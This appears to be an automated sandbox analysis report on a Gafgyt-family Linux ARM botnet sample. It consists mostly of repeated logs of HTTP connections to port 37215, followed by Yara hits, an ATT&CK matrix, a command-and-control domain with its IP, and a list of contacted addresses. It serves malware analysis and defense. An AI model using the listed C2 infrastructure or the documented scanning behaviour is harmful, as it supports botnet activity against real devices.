            Source: unknownNetwork traffic detected: HTTP traffic on port 45750 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42320 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44614 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37934 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56350 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56176 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42132 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37312 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55074 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52732 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41292 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42562 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42476 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46042 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40214 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60402 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45376 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60880 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41652 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45896 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55952 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60042 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51958 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46942 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46124 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44242 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35850 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48272 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54400 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48842 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46476 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53610 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44260 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58036 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37904 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48340 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42232 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47854 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40762 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54048 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47884 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37822 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42856 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44356 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44740 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52114 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51694 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49626 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51100 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41034 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47820 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48036 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59608 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42828 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60700 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56054 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49124 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36988 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39458 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39446 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51098 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54574 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57178 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54350 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38448 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52256 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44680 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35470 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46900 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34256 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45560 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40440 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42146 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34286 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44942 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57606 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56448 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59126 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60934 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45788 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53218 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59884 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33818 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59594 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57462 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36304 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42870 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51838 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60860 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51582 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54878 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45686 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41690 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59362 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55122 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47146 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35116 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53036 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40428 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37638 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34288 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47284 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58884 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40142 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51520 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46632 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43670 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39198 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33124 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34972 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55450 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40900 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54432 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56810 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52960 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52636 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38556 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46140 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47054 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41662 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58570 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41592 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40812 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47062 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40556 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38678 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55506 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56928 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52388 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41720 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53926 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55638 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44526 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55488 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41906 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55416 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36846 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39404 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43586 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34704 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36572 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36734 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60544 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48540 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60636 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54746 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52662 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57446 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34090 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38050 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54850 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50422 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36802 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55966 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43248 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35522 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36194 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39026 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47508 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60498 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47202 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55684 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34914 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42084 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40142 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40200 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34976 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37938 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49564 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46726 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41160 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51764 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54496 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54096 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53858 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 32848 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41910 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46254 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38592 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42360 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46918 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45028 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57130 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52440 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35634 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39042 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34512 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36666 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58422 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37230 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46936 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46438 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37982 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58498 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35824 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44738 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54942 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37638 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36940 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54112 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59008 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38690 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56528 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56106 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37922 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34756 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60648 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39130 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35478 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38554 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44604 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42574 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54128 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44696 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45116 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37094 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56412 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59448 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48176 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33768 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45514 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34874 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58856 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50740 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42018 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52876 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40542 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51020 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56912 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39372 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33328 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60852 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58868 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57362 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 32830 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40308 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36800 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34888 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56382 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33662 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45634 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34422 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49048 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49300 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40032 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38794 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52360 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40568 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52772 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53322 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48342 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33100 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37358 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43806 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56438 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49578 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50964 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38584 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53726 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59958 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46318 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34346 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55784 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54096 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58868 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40542 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54096 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40542 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52206 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38072 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39200 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37200 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39142 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52642 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48762 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39096 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55772 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38070 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48338 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45624 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46024 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35726 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 37215
            Source: /tmp/skt.arm6.elf (PID: 5497)Queries kernel information via 'uname': Jump to behavior
            Source: skt.arm6.elf, 5497.1.0000558981b63000.0000558981cb2000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
            Source: skt.arm6.elf, 5497.1.0000558981b63000.0000558981cb2000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: skt.arm6.elf, 5497.1.00007ffeb8567000.00007ffeb8588000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: skt.arm6.elf, 5497.1.00007ffeb8567000.00007ffeb8588000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/skt.arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/skt.arm6.elf

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: skt.arm6.elf, type: SAMPLE
            Source: Yara matchFile source: 5497.1.00007fa430017000.00007fa43002a000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: skt.arm6.elf PID: 5497, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: skt.arm6.elf, type: SAMPLE
            Source: Yara matchFile source: 5497.1.00007fa430017000.00007fa43002a000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: skt.arm6.elf PID: 5497, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote ServicesData from Local System11
            Non-Standard Port
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448421 Sample: skt.arm6.elf Startdate: 28/05/2024 Architecture: LINUX Score: 88 18 160.110.28.32 WOODYNET-2US United States 2->18 20 208.66.246.209 WKNETUS United States 2->20 22 99 other IPs or domains 2->22 24 Snort IDS alert for network traffic 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 3 other signatures 2->30 8 skt.arm6.elf 2->8         started        signatures3 process4 process5 10 skt.arm6.elf 8->10         started        process6 12 skt.arm6.elf 10->12         started        14 skt.arm6.elf 10->14         started        16 skt.arm6.elf 10->16         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            skt.arm6.elf100%AviraEXP/ELF.Gafgyt.X
            No Antivirus matches
            SourceDetectionScannerLabelLink
            bots.gxz.me10%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bots.gxz.me
            141.98.7.43
            truefalseunknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/soap/encoding/skt.arm6.elffalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/soap/envelope/skt.arm6.elffalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            149.176.204.70
            unknownAustralia
            87INDIANA-ASUSfalse
            157.198.172.23
            unknownUnited States
            4704SANNETRakutenMobileIncJPfalse
            39.61.254.102
            unknownPakistan
            45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
            133.80.121.35
            unknownJapan55904KOGAKUIN-ASKOGAKUINUniversityJPfalse
            41.241.171.246
            unknownSudan
            36998SDN-MOBITELSDfalse
            197.58.252.106
            unknownEgypt
            8452TE-ASTE-ASEGfalse
            20.1.227.158
            unknownUnited States
            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
            41.165.218.91
            unknownSouth Africa
            36937Neotel-ASZAfalse
            34.35.26.222
            unknownUnited States
            2686ATGS-MMD-ASUSfalse
            197.226.240.60
            unknownMauritius
            23889MauritiusTelecomMUfalse
            154.146.240.94
            unknownMorocco
            6713IAM-ASMAfalse
            173.45.40.75
            unknownUnited States
            33597ATLANTIC-METRO-COMMUNICATIONS-II-INCUSfalse
            204.129.69.252
            unknownUnited States
            13940SJCOEUSfalse
            197.13.57.225
            unknownTunisia
            37504MeninxTNfalse
            141.27.32.14
            unknownGermany
            680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
            121.48.202.31
            unknownChina
            4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
            41.179.133.17
            unknownEgypt
            24863LINKdotNET-ASEGfalse
            41.179.133.13
            unknownEgypt
